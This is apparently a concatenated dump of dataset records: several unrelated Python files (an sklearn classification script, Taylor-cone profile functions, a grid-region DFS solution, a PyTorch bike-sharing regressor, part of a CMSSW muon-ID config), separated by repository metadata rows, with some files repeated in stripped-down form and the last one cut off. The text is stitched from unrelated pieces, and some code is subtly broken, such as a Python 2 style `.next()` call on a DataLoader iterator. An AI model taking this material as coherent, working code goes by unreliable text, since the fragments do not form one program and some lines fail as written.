pm = engine.pixmap(QtCore.QSize(32, 32), mode=QtGui.QIcon.Disabled, state=QtGui.QIcon.On) | 1,354 | 0 | 138 |
5d8d397e6a8ca3fdf09cc0422991f6bb28d600a0 | 3,758 | py | Python | ex4/4_2_binary_classification/4_2_binary_classification.py | Jeilef/FoSA | d4b53bd687d06af80f91d4c7c96c1ef97708933f | [
"MIT"
] | null | null | null | ex4/4_2_binary_classification/4_2_binary_classification.py | Jeilef/FoSA | d4b53bd687d06af80f91d4c7c96c1ef97708933f | [
"MIT"
] | null | null | null | ex4/4_2_binary_classification/4_2_binary_classification.py | Jeilef/FoSA | d4b53bd687d06af80f91d4c7c96c1ef97708933f | [
"MIT"
] | null | null | null | import argparse, os
from sklearn.linear_model import LogisticRegression
from sklearn.svm import SVR
import pandas as pd
from scipy.io import arff
# to get the summary both logistic-regression and support-vector-machines have to be run once with the output errors option
if __name__ == "__main__":
parser = argparse.ArgumentParser('FSA')
parser.add_argument('--type', type=str, help='which kind of regression', choices=["logistic-regression", "support-vector-machine"])
parser.add_argument('--output-error-values', action='store_true', default=False, help='display error values instead of output')
parser.add_argument('--train', type=str, help='training dataset', default='MC2-train.arff')
parser.add_argument('--predict', type=str, help='prediction dataset', default='MC2-predict.arff')
args = parser.parse_args()
train_data_arff = arff.loadarff(args.train)
train_data = pd.DataFrame(train_data_arff[0])
train_data = train_data.fillna(0)
prediction_data = pd.DataFrame(arff.loadarff(args.predict)[0])
prediction_data = prediction_data.fillna(0)
if args.type == "logistic-regression":
model = train_log_reg(train_data)
else:
model = train_svm(train_data)
if args.output_error_values:
save_error_values(model, train_data, prediction_data, args.type)
else:
model_predict(model, prediction_data)
| 37.207921 | 135 | 0.685737 | import argparse, os
from sklearn.linear_model import LogisticRegression
from sklearn.svm import SVR
import pandas as pd
from scipy.io import arff
def train_svm(train_dataset):
    """Fit an RBF-kernel SVR; every column but the last is a feature.

    Labels are expected as one-element cells (scipy's arff loader shape),
    so the scalar is pulled out of each cell before fitting.
    """
    column_names = train_dataset.columns.values
    feature_matrix = train_dataset[column_names[:-1]].to_numpy()
    labels = [cell[0] for cell in train_dataset[column_names[-1]].to_numpy()]
    # gamma = 2 since: gamma = 1/(2*sigma^2)
    regressor = SVR(kernel="rbf", C=1, gamma=2)
    return regressor.fit(feature_matrix, labels)
def train_log_reg(train_dataset):
    """Fit a LogisticRegression classifier; every column but the last is a feature.

    Labels are unwrapped from their one-element cells, mirroring train_svm.
    """
    column_names = train_dataset.columns.values
    feature_matrix = train_dataset[column_names[:-1]].to_numpy()
    labels = [cell[0] for cell in train_dataset[column_names[-1]].to_numpy()]
    return LogisticRegression().fit(feature_matrix, labels)
def model_predict(model, predict_dataset, printing=True):
    """Run the fitted model on every row (label column dropped) and return predictions.

    When ``printing`` is True each numeric prediction is echoed as the ASCII
    character it encodes (labels in this dataset are character codes).
    """
    column_names = predict_dataset.columns.values
    feature_matrix = predict_dataset[column_names[:-1]].to_numpy()
    predicted = model.predict(feature_matrix)
    if printing:
        for value in predicted:
            print(chr(int(value)))
    return predicted
# to get the summary both logistic-regression and support-vector-machines have to be run once with the output errors option
def save_error_values(model, train_dataset, predict_dataset, model_type):
    """Compute train/prediction misclassification rates and write them to disk.

    Writes '<model_type>-error-report.txt'; once reports for *both* model
    types exist on disk, concatenates them into a combined 'error-report.txt'
    (which is why each model type must be run once — see the module comment).
    """
    # Raw model outputs for both splits (suppress per-row character printing).
    train_res = model_predict(model, train_dataset, printing=False)
    pred_res = model_predict(model, predict_dataset, printing=False)
    # Ground-truth labels from the last column of each dataset.
    train_actual = actual_values(train_dataset)
    pred_actual = actual_values(predict_dataset)
    train_wrong = 0
    pred_wrong = 0
    # Predictions may be floats (e.g. from SVR); truncate to int to compare.
    for a, p in zip(train_actual, train_res):
        if a != int(p):
            train_wrong += 1
    for a, p in zip(pred_actual, pred_res):
        if a != int(p):
            pred_wrong += 1
    type_string = model_type + " error report\n"
    train_error = "train error: " + str(train_wrong*100/len(train_actual)) + "%\n"
    pred_error = "prediction error: " + str(pred_wrong * 100 / len(pred_actual)) + "%"
    output_string = type_string + train_error + pred_error
    with open(model_type + '-error-report.txt', 'w') as error_file:
        error_file.write(output_string)
    print(output_string)
    # Merge the two per-model reports once both runs have happened.
    if os.path.exists('support-vector-machine-error-report.txt') and os.path.exists('logistic-regression-error-report.txt'):
        with open('error-report.txt', 'w') as error_report:
            with open('logistic-regression-error-report.txt') as lr_report:
                error_report.write(lr_report.read())
            error_report.write('\n\n')
            with open('support-vector-machine-error-report.txt') as svm_report:
                error_report.write(svm_report.read())
def actual_values(dataset):
    """Return the label column (last column) of *dataset* as a flat list.

    Each cell is expected to hold a one-element sequence (the shape produced
    by scipy's arff loader), so the first element of every cell is extracted.
    """
    label_column = dataset.columns.values[-1]
    result = []
    for cell in dataset[label_column].to_numpy():
        result.append(cell[0])
    return result
if __name__ == "__main__":
    # CLI: pick a model type; optionally emit error-rate reports instead of
    # the per-row character predictions.
    parser = argparse.ArgumentParser('FSA')
    parser.add_argument('--type', type=str, help='which kind of regression', choices=["logistic-regression", "support-vector-machine"])
    parser.add_argument('--output-error-values', action='store_true', default=False, help='display error values instead of output')
    parser.add_argument('--train', type=str, help='training dataset', default='MC2-train.arff')
    parser.add_argument('--predict', type=str, help='prediction dataset', default='MC2-predict.arff')
    args = parser.parse_args()
    # Load both ARFF datasets into DataFrames; missing values become 0.
    train_data_arff = arff.loadarff(args.train)
    train_data = pd.DataFrame(train_data_arff[0])
    train_data = train_data.fillna(0)
    prediction_data = pd.DataFrame(arff.loadarff(args.predict)[0])
    prediction_data = prediction_data.fillna(0)
    # Any --type other than logistic-regression falls through to the SVM.
    if args.type == "logistic-regression":
        model = train_log_reg(train_data)
    else:
        model = train_svm(train_data)
    if args.output_error_values:
        save_error_values(model, train_data, prediction_data, args.type)
    else:
        model_predict(model, prediction_data)
| 2,246 | 0 | 114 |
327fc17dee8a883eb99c23c7dc2a82bf1781a06f | 757 | py | Python | ElectrospraySimulator/GUI_scripts/PredefinedFuns.py | DavidPoves/Liquid-meniscus-in-the-ionic-regime-simulator | 9a8cfce64ae2adb06c39418fdbbb187c75431c69 | [
"MIT"
] | null | null | null | ElectrospraySimulator/GUI_scripts/PredefinedFuns.py | DavidPoves/Liquid-meniscus-in-the-ionic-regime-simulator | 9a8cfce64ae2adb06c39418fdbbb187c75431c69 | [
"MIT"
] | null | null | null | ElectrospraySimulator/GUI_scripts/PredefinedFuns.py | DavidPoves/Liquid-meniscus-in-the-ionic-regime-simulator | 9a8cfce64ae2adb06c39418fdbbb187c75431c69 | [
"MIT"
] | null | null | null | import numpy as np
"""
Within this file, the predefined functions appearing in the main menu may be defined. If a new one is added, it must be
added to the attributes self.predef_funs_show and self.predef_funs of the PredefinedFunctions class from the MainMenu.py
file. Moreover, these functions must be added to the self.save method from the previous class.
"""
| 24.419355 | 120 | 0.660502 | import numpy as np
"""
Within this file, the predefined functions appearing in the main menu may be defined. If a new one is added, it must be
added to the attributes self.predef_funs_show and self.predef_funs of the PredefinedFunctions class from the MainMenu.py
file. Moreover, these functions must be added to the self.save method from the previous class.
"""
def TaylorCone(s, b=20.0, half_angle_deg=49.3, r0=1.0):
    """Rational parametrization of a Taylor-cone-like meniscus profile.

    Generalizes the original hard-coded curve: with the default arguments the
    returned (r, z) values are numerically identical to the previous
    implementation. The shared denominator is now computed once.

    Parameters
    ----------
    s : float or array-like
        Curve parameter, s in [0, 1] maps the profile from (r0, 0) to the apex.
    b : float, optional
        Shape/weight constant of the rational parametrization (was the
        hard-coded 20).
    half_angle_deg : float, optional
        Cone half-angle in degrees; the default 49.3 matches the classical
        Taylor cone semi-angle (~49.29 deg).
    r0 : float, optional
        Radial scale of the profile (was the hard-coded factor 1).

    Returns
    -------
    (r, z) : tuple
        Radial and axial coordinates of the profile point(s).
    """
    denom = 1 - 2*s*(1-s)*(1-b)
    r = (1 - 2*s) * r0 / denom
    # 1/tan(angle) is the cotangent of the cone half-angle.
    z = 2*(1-s)*s*b * r0 / (np.tan(np.radians(half_angle_deg)) * denom)
    return r, z
def CosineFunction(r):
    """Cosine-arch profile: z(r) = 0.5*cos(pi*r/2), so (0, 0.5) down to (1, 0)."""
    quarter_wave = np.pi/2 * r
    return r, 0.5*np.cos(quarter_wave)
def ParabolicFunction(r):
    """Parabolic profile with vertex (0, 0.5) that passes through (1, 0)."""
    vertex_r, vertex_z = 0, 0.5
    # Leading coefficient chosen so the parabola hits z = 0 at r = 1.
    coefficient = -(vertex_z)/(1-vertex_r)**2
    return r, coefficient*(r-vertex_r)**2 + vertex_z
def StraightLine(r):
    """Linear profile from (0, 0.5) down to (1, 0)."""
    return r, 0.5*(1-r)
| 297 | 0 | 92 |
727e5a69e567a4226eac8c6955f63566c5e67590 | 1,284 | py | Python | algorithm/graph_theory/connected_cell/solution.py | delaanthonio/hackerrank | b1f2e1e93b3260be90eb3b8cb8e86e9a700acf27 | [
"MIT"
] | 1 | 2017-07-02T01:35:39.000Z | 2017-07-02T01:35:39.000Z | algorithm/graph_theory/connected_cell/solution.py | delaanthonio/hackerrank | b1f2e1e93b3260be90eb3b8cb8e86e9a700acf27 | [
"MIT"
] | null | null | null | algorithm/graph_theory/connected_cell/solution.py | delaanthonio/hackerrank | b1f2e1e93b3260be90eb3b8cb8e86e9a700acf27 | [
"MIT"
] | 1 | 2018-04-03T15:11:56.000Z | 2018-04-03T15:11:56.000Z | #!/usr/bin/env python3
"""
:problem: https://www.hackerrank.com/challenges/ctci-connected-cell-in-a-grid/problem
"""
from typing import List, Set, Tuple
Cell = Tuple[int, int]
if __name__ == '__main__':
main()
| 24.226415 | 85 | 0.492212 | #!/usr/bin/env python3
"""
:problem: https://www.hackerrank.com/challenges/ctci-connected-cell-in-a-grid/problem
"""
from typing import List, Set, Tuple
Cell = Tuple[int, int]
def dfs_region(grid: List[List[int]], visited: Set[Cell], start: Cell) -> int:
    """Return the size of the 8-connected region of filled cells containing *start*.

    :param grid: 0/1 matrix whose outer border must be zero-padded (``main``
        builds it that way), so neighbor lookups never go out of bounds.
    :param visited: cells already assigned to a region; updated in place.
    :param start: seed cell, assumed to satisfy ``grid[row][col] != 0``.
    :return: number of cells in the region, or 0 when *start* was already
        counted. (The previous code returned 1 there, misreporting an empty
        discovery; callers only compare against a running maximum, so 0 is
        both correct and safe.)
    """
    if start in visited:
        return 0
    # Iterative DFS: mark cells as visited when pushed so each is counted once
    # (the old version re-pushed the start cell through its own neighborhood).
    stack = [start]
    visited.add(start)
    area = 0
    while stack:
        row, col = stack.pop()
        area += 1
        for i in range(row - 1, row + 2):
            for j in range(col - 1, col + 2):
                if grid[i][j] and (i, j) not in visited:
                    visited.add((i, j))
                    stack.append((i, j))
    return area
def main():
    """Read a rows x cols 0/1 grid from stdin and print the largest region size."""
    rows = int(input())
    cols = int(input())
    grid = []
    # Pad the grid with a zero border so dfs_region never needs bounds checks.
    grid.append([0] * (cols + 2))
    for _ in range(rows):
        grid.append([0] + [int(x) for x in input().split()] + [0])
    grid.append([0] * (cols + 2))
    max_area = 0
    visited = set()
    # Scan only the interior (original) cells; `visited` is shared across calls
    # so each region's cells are explored at most once overall.
    for i in range(1, rows + 1):
        for j in range(1, cols + 1):
            if grid[i][j]:
                cell = (i, j)
                area = dfs_region(grid, visited, cell)
                if area > max_area:
                    max_area = area
    print(max_area)
# Script entry point.
if __name__ == '__main__':
    main()
| 1,018 | 0 | 46 |
bfb08d3994e7214fb72cf9fbaa7086621a4d8da3 | 4,713 | py | Python | FC.py | mahootiha-maryam/DL-for-image-analysis | 2e645341a6d3c54b2dbe31a04f96c2a06a5793c9 | [
"Apache-2.0"
] | null | null | null | FC.py | mahootiha-maryam/DL-for-image-analysis | 2e645341a6d3c54b2dbe31a04f96c2a06a5793c9 | [
"Apache-2.0"
] | null | null | null | FC.py | mahootiha-maryam/DL-for-image-analysis | 2e645341a6d3c54b2dbe31a04f96c2a06a5793c9 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
'''
This is a fully connected neural network.
It contains data batching , using Relu activation function,
using adam optimizer and dropout for overfitting.
'''
import torch
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import sklearn
data = pd.read_csv('bike_sharing.csv', index_col=0)
'''
plt.figure(figsize=(8, 6))
#x is yr y is cnt and coloring is based on the spring
sns.barplot('yr', 'cnt', hue = 'season', data = data, ci=None)
plt.legend(loc = 'upper right', bbox_to_anchor=(1.2,0.5))
plt.xlabel('Year')
plt.ylabel('Total number of bikes rented')
plt.title('Number of bikes rented per season')
'''
'''
plt.figure(figsize=(8, 6))
sns.barplot('mnth', 'cnt', hue = 'workingday', data = data, ci=None)
plt.legend(loc = 'upper right', bbox_to_anchor=(1.2,0.5))
plt.xlabel('Year')
plt.ylabel('Total number of bikes rented')
plt.title('Number of bikes rented per month')
'''
#get the seazon field and change each attribute to one column
data = pd.get_dummies(data, columns= ['season'])
#need just these columns
columns = ['registered', 'holiday', 'weekday',
'weathersit', 'temp', 'atemp',
'season_fall', 'season_spring',
'season_summer', 'season_winter']
#features are the input(xtrain) of neural network and target is the ytrain
features=data[columns]
target=data[['cnt']]
#use sklearn for dividing our data to train and test
from sklearn.model_selection import train_test_split
#80 percent of data is for training
X_train, x_test, Y_train, y_test = train_test_split(features,
target,
test_size=0.2)
#change to tensors
X_train_tensor = torch.tensor(X_train.values, dtype = torch.float)
x_test_tensor = torch.tensor(x_test.values, dtype = torch.float)
Y_train_tensor = torch.tensor(Y_train.values, dtype = torch.float)
y_test_tensor = torch.tensor(y_test.values, dtype = torch.float)
'''
batch the data
'''
#use data utils for batching
import torch.utils.data as data_utils
#tensordataset and loader both used to load multiple samples in parallel
train_data = data_utils.TensorDataset(X_train_tensor, Y_train_tensor)
train_loader = data_utils.DataLoader(train_data, batch_size=100, shuffle=True)
features_batch, target_batch = iter(train_loader).next()
inp = X_train_tensor.shape[1]
out = 1
hid = 10
loss_fn = torch.nn.MSELoss()
#making the neural network model
model = torch.nn.Sequential(torch.nn.Linear(inp, hid),
torch.nn.ReLU(),
#dropout is good for overfitting the p is the
#probability of deleting the neuron
torch.nn.Dropout(p=0.2),
torch.nn.Linear(hid, out))
#defining the optimizer
optimizer = torch.optim.Adam(model.parameters(), lr = 0.001)
##############################################
##make epochs based on the train loader size##
##############################################
total_step = len(train_loader)
num_epochs = 10000
#train model based on every batch data
for epoch in range(num_epochs + 1):
for i, (features, target) in enumerate(train_loader):
output = model(features)
loss = loss_fn(output, target)
optimizer.zero_grad()
loss.backward()
optimizer.step()
if epoch % 2000 == 0:
print ('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'
.format(epoch+1, num_epochs, i+1, total_step, loss.item()))
#evaluate our model
model.eval()
#get all predicted y value for the all x test
with torch.no_grad():
y_pred_tensor = model(x_test_tensor)
y_pred = y_pred_tensor.detach().numpy()
#make a table for comparing between actual and predicted
compare_df = pd.DataFrame({'actual': np.squeeze(y_test.values), 'predicted': np.squeeze(y_pred)})
#show ten random samples of data frame
print(compare_df.sample(10))
print(sklearn.metrics.r2_score(y_test, y_pred))
'''
Pytorch allows our model to be saved. The parameters to the torch.save()
method are the model to be saved followed by the directory path where it
should be saved
'''
torch.save(model, 'my_model')
#We can load a saved model using the torch.load() method
saved_model = torch.load('my_model')
'''
#It is now used exactly how we used the model before it was saved
y_pred_tensor = saved_model(x_test_tensor)
y_pred = y_pred_tensor.detach().numpy()
'''
#comparing the predicted and actual values with plot
plt.figure(figsize=(12, 8))
plt.plot(y_pred, label='Predicted count')
plt.plot(y_test.values, label='Actual count')
plt.legend()
plt.show() | 30.406452 | 97 | 0.663484 | # -*- coding: utf-8 -*-
'''
This is a fully connected neural network.
It contains data batching , using Relu activation function,
using adam optimizer and dropout for overfitting.
'''
import torch
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import sklearn
# Load the bike-sharing dataset; the first CSV column is used as the index.
data = pd.read_csv('bike_sharing.csv', index_col=0)
'''
plt.figure(figsize=(8, 6))
#x is yr y is cnt and coloring is based on the spring
sns.barplot('yr', 'cnt', hue = 'season', data = data, ci=None)
plt.legend(loc = 'upper right', bbox_to_anchor=(1.2,0.5))
plt.xlabel('Year')
plt.ylabel('Total number of bikes rented')
plt.title('Number of bikes rented per season')
'''
'''
plt.figure(figsize=(8, 6))
sns.barplot('mnth', 'cnt', hue = 'workingday', data = data, ci=None)
plt.legend(loc = 'upper right', bbox_to_anchor=(1.2,0.5))
plt.xlabel('Year')
plt.ylabel('Total number of bikes rented')
plt.title('Number of bikes rented per month')
'''
#get the seazon field and change each attribute to one column
data = pd.get_dummies(data, columns= ['season'])
#need just these columns
columns = ['registered', 'holiday', 'weekday',
           'weathersit', 'temp', 'atemp',
           'season_fall', 'season_spring',
           'season_summer', 'season_winter']
#features are the input(xtrain) of neural network and target is the ytrain
features=data[columns]
target=data[['cnt']]
#use sklearn for dividing our data to train and test
from sklearn.model_selection import train_test_split
#80 percent of data is for training
X_train, x_test, Y_train, y_test = train_test_split(features,
                                                    target,
                                                    test_size=0.2)
#change to tensors
X_train_tensor = torch.tensor(X_train.values, dtype = torch.float)
x_test_tensor = torch.tensor(x_test.values, dtype = torch.float)
Y_train_tensor = torch.tensor(Y_train.values, dtype = torch.float)
y_test_tensor = torch.tensor(y_test.values, dtype = torch.float)
'''
batch the data
'''
#use data utils for batching
import torch.utils.data as data_utils
#tensordataset and loader both used to load multiple samples in parallel
train_data = data_utils.TensorDataset(X_train_tensor, Y_train_tensor)
train_loader = data_utils.DataLoader(train_data, batch_size=100, shuffle=True)
# NOTE(review): `.next()` is the Python 2 iterator protocol; on Python 3 this
# line needs next(iter(train_loader)).
features_batch, target_batch = iter(train_loader).next()
# Network sizes: input width from the feature matrix, one hidden layer of 10
# units, a single regression output.
inp = X_train_tensor.shape[1]
out = 1
hid = 10
loss_fn = torch.nn.MSELoss()
#making the neural network model
model = torch.nn.Sequential(torch.nn.Linear(inp, hid),
                            torch.nn.ReLU(),
                            #dropout is good for overfitting the p is the
                            #probability of deleting the neuron
                            torch.nn.Dropout(p=0.2),
                            torch.nn.Linear(hid, out))
#defining the optimizer
optimizer = torch.optim.Adam(model.parameters(), lr = 0.001)
##############################################
##make epochs based on the train loader size##
##############################################
total_step = len(train_loader)
num_epochs = 10000
#train model based on every batch data
for epoch in range(num_epochs + 1):
    for i, (features, target) in enumerate(train_loader):
        output = model(features)
        loss = loss_fn(output, target)
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()
    # `i` and `loss` intentionally leak out of the inner loop: the progress
    # line reports the last batch of the epoch.
    if epoch % 2000 == 0:
        print ('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'
               .format(epoch+1, num_epochs, i+1, total_step, loss.item()))
#evaluate our model
model.eval()
#get all predicted y value for the all x test
with torch.no_grad():
    y_pred_tensor = model(x_test_tensor)
y_pred = y_pred_tensor.detach().numpy()
#make a table for comparing between actual and predicted
compare_df = pd.DataFrame({'actual': np.squeeze(y_test.values), 'predicted': np.squeeze(y_pred)})
#show ten random samples of data frame
print(compare_df.sample(10))
# NOTE(review): only the top-level `sklearn` package is imported above; confirm
# that `sklearn.metrics` resolves as an attribute in this environment.
print(sklearn.metrics.r2_score(y_test, y_pred))
'''
Pytorch allows our model to be saved. The parameters to the torch.save()
method are the model to be saved followed by the directory path where it
should be saved
'''
torch.save(model, 'my_model')
#We can load a saved model using the torch.load() method
saved_model = torch.load('my_model')
'''
#It is now used exactly how we used the model before it was saved
y_pred_tensor = saved_model(x_test_tensor)
y_pred = y_pred_tensor.detach().numpy()
'''
#comparing the predicted and actual values with plot
plt.figure(figsize=(12, 8))
plt.plot(y_pred, label='Predicted count')
plt.plot(y_test.values, label='Actual count')
plt.legend()
plt.show() | 0 | 0 | 0 |
9b0433912348ba45b8e9413dd40fe8c371f9ea92 | 11,956 | py | Python | HLTrigger/Configuration/python/HLT_75e33/modules/hltPhase2L3MuonsNoID_cfi.py | PKUfudawei/cmssw | 8fbb5ce74398269c8a32956d7c7943766770c093 | [
"Apache-2.0"
] | 1 | 2021-11-30T16:24:46.000Z | 2021-11-30T16:24:46.000Z | HLTrigger/Configuration/python/HLT_75e33/modules/hltPhase2L3MuonsNoID_cfi.py | PKUfudawei/cmssw | 8fbb5ce74398269c8a32956d7c7943766770c093 | [
"Apache-2.0"
] | 4 | 2021-11-29T13:57:56.000Z | 2022-03-29T06:28:36.000Z | HLTrigger/Configuration/python/HLT_75e33/modules/hltPhase2L3MuonsNoID_cfi.py | PKUfudawei/cmssw | 8fbb5ce74398269c8a32956d7c7943766770c093 | [
"Apache-2.0"
] | 1 | 2021-11-30T16:16:05.000Z | 2021-11-30T16:16:05.000Z | import FWCore.ParameterSet.Config as cms
hltPhase2L3MuonsNoID = cms.EDProducer("MuonIdProducer",
CaloExtractorPSet = cms.PSet(
CenterConeOnCalIntersection = cms.bool(False),
ComponentName = cms.string('CaloExtractorByAssociator'),
DR_Max = cms.double(1.0),
DR_Veto_E = cms.double(0.07),
DR_Veto_H = cms.double(0.1),
DR_Veto_HO = cms.double(0.1),
DepositInstanceLabels = cms.vstring(
'ecal',
'hcal',
'ho'
),
DepositLabel = cms.untracked.string('Cal'),
NoiseTow_EB = cms.double(0.04),
NoiseTow_EE = cms.double(0.15),
Noise_EB = cms.double(0.025),
Noise_EE = cms.double(0.1),
Noise_HB = cms.double(0.2),
Noise_HE = cms.double(0.2),
Noise_HO = cms.double(0.2),
PrintTimeReport = cms.untracked.bool(False),
PropagatorName = cms.string('hltESPFastSteppingHelixPropagatorAny'),
ServiceParameters = cms.PSet(
Propagators = cms.untracked.vstring('hltESPFastSteppingHelixPropagatorAny'),
RPCLayers = cms.bool(False),
UseMuonNavigation = cms.untracked.bool(False)
),
Threshold_E = cms.double(0.2),
Threshold_H = cms.double(0.5),
Threshold_HO = cms.double(0.5),
TrackAssociatorParameters = cms.PSet(
CSCSegmentCollectionLabel = cms.InputTag("hltCscSegments"),
CaloTowerCollectionLabel = cms.InputTag("Notused"),
DTRecSegment4DCollectionLabel = cms.InputTag("hltDt4DSegments"),
EBRecHitCollectionLabel = cms.InputTag("Notused"),
EERecHitCollectionLabel = cms.InputTag("Notused"),
HBHERecHitCollectionLabel = cms.InputTag("Notused"),
HORecHitCollectionLabel = cms.InputTag("Notused"),
accountForTrajectoryChangeCalo = cms.bool(False),
dREcal = cms.double(1.0),
dREcalPreselection = cms.double(1.0),
dRHcal = cms.double(1.0),
dRHcalPreselection = cms.double(1.0),
dRMuon = cms.double(9999.0),
dRMuonPreselection = cms.double(0.2),
dRPreshowerPreselection = cms.double(0.2),
muonMaxDistanceSigmaX = cms.double(0.0),
muonMaxDistanceSigmaY = cms.double(0.0),
muonMaxDistanceX = cms.double(5.0),
muonMaxDistanceY = cms.double(5.0),
propagateAllDirections = cms.bool(True),
trajectoryUncertaintyTolerance = cms.double(-1.0),
truthMatch = cms.bool(False),
useCalo = cms.bool(True),
useEcal = cms.bool(False),
useHO = cms.bool(False),
useHcal = cms.bool(False),
useMuon = cms.bool(False),
usePreshower = cms.bool(False)
),
UseRecHitsFlag = cms.bool(False)
),
JetExtractorPSet = cms.PSet(
ComponentName = cms.string('JetExtractor'),
DR_Max = cms.double(1.0),
DR_Veto = cms.double(0.1),
ExcludeMuonVeto = cms.bool(True),
JetCollectionLabel = cms.InputTag("Notused"),
PrintTimeReport = cms.untracked.bool(False),
PropagatorName = cms.string('hltESPFastSteppingHelixPropagatorAny'),
ServiceParameters = cms.PSet(
Propagators = cms.untracked.vstring('hltESPFastSteppingHelixPropagatorAny'),
RPCLayers = cms.bool(False),
UseMuonNavigation = cms.untracked.bool(False)
),
Threshold = cms.double(5.0),
TrackAssociatorParameters = cms.PSet(
CSCSegmentCollectionLabel = cms.InputTag("hltCscSegments"),
CaloTowerCollectionLabel = cms.InputTag("Notused"),
DTRecSegment4DCollectionLabel = cms.InputTag("hltDt4DSegments"),
EBRecHitCollectionLabel = cms.InputTag("Notused"),
EERecHitCollectionLabel = cms.InputTag("Notused"),
HBHERecHitCollectionLabel = cms.InputTag("Notused"),
HORecHitCollectionLabel = cms.InputTag("Notused"),
accountForTrajectoryChangeCalo = cms.bool(False),
dREcal = cms.double(0.5),
dREcalPreselection = cms.double(0.5),
dRHcal = cms.double(0.5),
dRHcalPreselection = cms.double(0.5),
dRMuon = cms.double(9999.0),
dRMuonPreselection = cms.double(0.2),
dRPreshowerPreselection = cms.double(0.2),
muonMaxDistanceSigmaX = cms.double(0.0),
muonMaxDistanceSigmaY = cms.double(0.0),
muonMaxDistanceX = cms.double(5.0),
muonMaxDistanceY = cms.double(5.0),
propagateAllDirections = cms.bool(True),
trajectoryUncertaintyTolerance = cms.double(-1.0),
truthMatch = cms.bool(False),
useCalo = cms.bool(True),
useEcal = cms.bool(False),
useHO = cms.bool(False),
useHcal = cms.bool(False),
useMuon = cms.bool(False),
usePreshower = cms.bool(False)
)
),
MuonCaloCompatibility = cms.PSet(
MuonTemplateFileName = cms.FileInPath('RecoMuon/MuonIdentification/data/MuID_templates_muons_lowPt_3_1_norm.root'),
PionTemplateFileName = cms.FileInPath('RecoMuon/MuonIdentification/data/MuID_templates_pions_lowPt_3_1_norm.root'),
allSiPMHO = cms.bool(False),
delta_eta = cms.double(0.02),
delta_phi = cms.double(0.02)
),
TimingFillerParameters = cms.PSet(
CSCTimingParameters = cms.PSet(
CSCStripError = cms.double(7.0),
CSCStripTimeOffset = cms.double(0.0),
CSCTimeOffset = cms.double(0.0),
CSCWireError = cms.double(8.6),
CSCWireTimeOffset = cms.double(0.0),
CSCsegments = cms.InputTag("hltCscSegments"),
MatchParameters = cms.PSet(
CSCsegments = cms.InputTag("hltCscSegments"),
DTradius = cms.double(0.01),
DTsegments = cms.InputTag("hltDt4DSegments"),
TightMatchCSC = cms.bool(True),
TightMatchDT = cms.bool(False)
),
PruneCut = cms.double(100.0),
ServiceParameters = cms.PSet(
Propagators = cms.untracked.vstring('hltESPFastSteppingHelixPropagatorAny'),
RPCLayers = cms.bool(True)
),
UseStripTime = cms.bool(True),
UseWireTime = cms.bool(True),
debug = cms.bool(False)
),
DTTimingParameters = cms.PSet(
DTTimeOffset = cms.double(2.7),
DTsegments = cms.InputTag("hltDt4DSegments"),
DoWireCorr = cms.bool(False),
DropTheta = cms.bool(True),
HitError = cms.double(6.0),
HitsMin = cms.int32(5),
MatchParameters = cms.PSet(
CSCsegments = cms.InputTag("hltCscSegments"),
DTradius = cms.double(0.01),
DTsegments = cms.InputTag("hltDt4DSegments"),
TightMatchCSC = cms.bool(True),
TightMatchDT = cms.bool(False)
),
PruneCut = cms.double(10000.0),
RequireBothProjections = cms.bool(False),
ServiceParameters = cms.PSet(
Propagators = cms.untracked.vstring('hltESPFastSteppingHelixPropagatorAny'),
RPCLayers = cms.bool(True)
),
UseSegmentT0 = cms.bool(False),
debug = cms.bool(False)
),
EcalEnergyCut = cms.double(0.4),
ErrorCSC = cms.double(7.4),
ErrorDT = cms.double(6.0),
ErrorEB = cms.double(2.085),
ErrorEE = cms.double(6.95),
UseCSC = cms.bool(True),
UseDT = cms.bool(True),
UseECAL = cms.bool(True)
),
TrackAssociatorParameters = cms.PSet(
CSCSegmentCollectionLabel = cms.InputTag("hltCscSegments"),
CaloTowerCollectionLabel = cms.InputTag("Notused"),
DTRecSegment4DCollectionLabel = cms.InputTag("hltDt4DSegments"),
EBRecHitCollectionLabel = cms.InputTag("Notused"),
EERecHitCollectionLabel = cms.InputTag("Notused"),
GEMSegmentCollectionLabel = cms.InputTag("hltGemSegments"),
HBHERecHitCollectionLabel = cms.InputTag("Notused"),
HORecHitCollectionLabel = cms.InputTag("Notused"),
ME0SegmentCollectionLabel = cms.InputTag("hltMe0Segments"),
accountForTrajectoryChangeCalo = cms.bool(False),
dREcal = cms.double(9999.0),
dREcalPreselection = cms.double(0.05),
dRHcal = cms.double(9999.0),
dRHcalPreselection = cms.double(0.2),
dRMuon = cms.double(9999.0),
dRMuonPreselection = cms.double(0.2),
dRPreshowerPreselection = cms.double(0.2),
muonMaxDistanceSigmaX = cms.double(0.0),
muonMaxDistanceSigmaY = cms.double(0.0),
muonMaxDistanceX = cms.double(5.0),
muonMaxDistanceY = cms.double(5.0),
propagateAllDirections = cms.bool(True),
trajectoryUncertaintyTolerance = cms.double(-1.0),
truthMatch = cms.bool(False),
useCalo = cms.bool(False),
useEcal = cms.bool(False),
useGEM = cms.bool(True),
useHO = cms.bool(False),
useHcal = cms.bool(False),
useME0 = cms.bool(False),
# useME0 = cms.bool(True), ### Thiago: in the offline RECO it is false...
useMuon = cms.bool(True),
usePreshower = cms.bool(False)
),
TrackExtractorPSet = cms.PSet(
BeamSpotLabel = cms.InputTag("offlineBeamSpot"),
BeamlineOption = cms.string('BeamSpotFromEvent'),
Chi2Ndof_Max = cms.double(1e+64),
Chi2Prob_Min = cms.double(-1.0),
ComponentName = cms.string('TrackExtractor'),
DR_Max = cms.double(1.0),
DR_Veto = cms.double(0.01),
Diff_r = cms.double(0.1),
Diff_z = cms.double(0.2),
NHits_Min = cms.uint32(0),
Pt_Min = cms.double(-1.0),
inputTrackCollection = cms.InputTag("hltPhase2L3MuonMerged")
),
TrackerKinkFinderParameters = cms.PSet(
diagonalOnly = cms.bool(False),
usePosition = cms.bool(False)
),
addExtraSoftMuons = cms.bool(False),
arbitrateTrackerMuons = cms.bool(True),
arbitrationCleanerOptions = cms.PSet(
ClusterDPhi = cms.double(0.6),
ClusterDTheta = cms.double(0.02),
Clustering = cms.bool(True),
ME1a = cms.bool(True),
Overlap = cms.bool(True),
OverlapDPhi = cms.double(0.0786),
OverlapDTheta = cms.double(0.02)
),
